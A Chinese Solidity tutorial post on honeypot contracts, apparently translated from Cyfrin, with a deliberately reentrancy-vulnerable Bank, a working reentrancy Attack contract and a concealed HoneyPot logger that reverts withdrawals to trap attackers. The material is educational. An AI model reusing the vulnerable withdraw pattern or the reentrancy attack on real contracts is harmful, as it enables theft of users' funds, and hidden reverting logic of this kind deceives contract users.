3分钟Solidity: 11.10 蜜罐

Rockbean2026-01-13 11:58

欢迎订阅专栏3分钟Solidity--智能合约--Web3区块链技术必学

如需获取本内容的最新版本,请参见 Cyfrin.io 上的Honeypot(代码示例)

蜜罐是一种用于诱捕黑客的陷阱。

漏洞

通过结合重入攻击和隐藏恶意代码这两种漏洞利用方式,我们可以构建一个能捕获恶意用户的合约。

scss 复制代码 
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.26;

/*
银行是一个调用Logger来记录事件的合约。
Bank.withdraw()函数容易受到重入攻击。
因此,黑客试图从银行中耗尽以太币。
但实际上,这个重入漏洞是给黑客设下的诱饵。
通过部署用HoneyPot替代Logger的Bank合约,这个合约就变成了
黑客的陷阱。让我们看看它是如何运作的。

1.  爱丽丝部署了蜜罐
2.  爱丽丝部署了银行合约,地址指向蜜罐
3.  爱丽丝向银行存入1个以太币
4.  伊芙发现银行合约的withdraw函数存在重入漏洞,决定发起攻击
5.  伊芙部署攻击合约,地址指向银行
6.  伊芙调用Attack.attack()并转入1个以太币,但交易失败

发生了什么?
伊芙调用Attack.attack()后,开始从银行合约提取以太币
当最后一次Bank.withdraw()即将完成时,它调用了logger.log()
Logger.log()调用了HoneyPot.log()并回滚了交易,导致交易失败
*/

contract Bank {
    mapping(address => uint256) public balances;
    Logger logger;

    constructor(Logger _logger) {
        logger = Logger(_logger);
    }

    function deposit() public payable {
        balances[msg.sender] += msg.value;
        logger.log(msg.sender, msg.value, "Deposit");
    }

    function withdraw(uint256 _amount) public {
        require(_amount <= balances[msg.sender], "Insufficient funds");

        (bool sent,) = msg.sender.call{value: _amount}("");
        require(sent, "Failed to send Ether");

        balances[msg.sender] -= _amount;

        logger.log(msg.sender, _amount, "Withdraw");
    }
}

contract Logger {
    event Log(address caller, uint256 amount, string action);

    function log(address _caller, uint256 _amount, string memory _action)
        public
    {
        emit Log(_caller, _amount, _action);
    }
}

// 黑客试图通过重入攻击耗尽银行中存储的以太币。
contract Attack {
    Bank bank;

    constructor(Bank _bank) {
        bank = Bank(_bank);
    }

    fallback() external payable {
        if (address(bank).balance >= 1 ether) {
            bank.withdraw(1 ether);
        }
    }

    function attack() public payable {
        bank.deposit{value: 1 ether}();
        bank.withdraw(1 ether);
    }

    function getBalance() public view returns (uint256) {
        return address(this).balance;
    }
}

// 假设这段代码放在一个单独的文件中,这样其他人就无法读取它了。
contract HoneyPot {
    function log(address _caller, uint256 _amount, string memory _action)
        public
    {
        if (equal(_action, "Withdraw")) {
            revert("It's a trap");
        }
    }

    // 使用keccak256比较字符串的函数
    function equal(string memory _a, string memory _b)
        public
        pure
        returns (bool)
    {
        return keccak256(abi.encode(_a)) == keccak256(abi.encode(_b));
    }
}

Try on Remix试用混音版

相关推荐
Web3_Daisy1 天前
Token 分红机制详解:实现逻辑、激励结构与风险分析
大数据·人工智能·物联网·web3·区块链
Web3VentureView3 天前
倒计时 12 小时,SYNBO 主网即将上线!
大数据·人工智能·金融·web3·区块链
碳链价值3 天前
Web3告别一刀切时代
web3
木西4 天前
Energy-Fi Protocol: 去中心化能源金融协议技术解析
web3·智能合约·solidity
Web3_Daisy4 天前
Flap怎么玩?低门槛 Meme 币的发射与链上策略
大数据·人工智能·web3·区块链·比特币
栗子~~5 天前
智能合约 -透明可升级合约[ hardhat、openzeppelin 、ethers ]的演示 demo
区块链·智能合约
TechubNews5 天前
從25Q4及全年財報數字看燦谷(Cango Inc)戰略轉向AI
网络·人工智能·web3·区块链
木西6 天前
Energy-Fi:基于 DePIN 的能源资产化协议设计与实现
web3·智能合约·solidity
暴躁小师兄数据学院6 天前
【WEB3.0零基础转行笔记】Go编程篇-第11讲:Gin框架
笔记·golang·web3·区块链·智能合约
奇树谦6 天前
从Web1.0到Web3.0:互联网迭代下工业软件的进化与变革
web3
热门推荐
01GitHub 镜像站点02Qwen3.5 开源全解析:从 0.8B 到 397B,代际升级 + 全场景选型指南03围棋-html版本04小黑课堂计算机二级WPSoffice题库软件下载安装教程(2026年3月最新版)05班级宠物园部署指南06OpenClaw 使用和管理 MCP 完全指南07AI 编程三剑客:Spec-Kit、OpenSpec、Superpowers 深度对比与实战指南08OpenClaw Control UI安全上下文访问配置09UV安装并设置国内源10“wsl --install -d Ubuntu-22.04”下载慢,中国地区离线安装 Ubuntu 22.04 WSL方法(亲测2025年5月6日)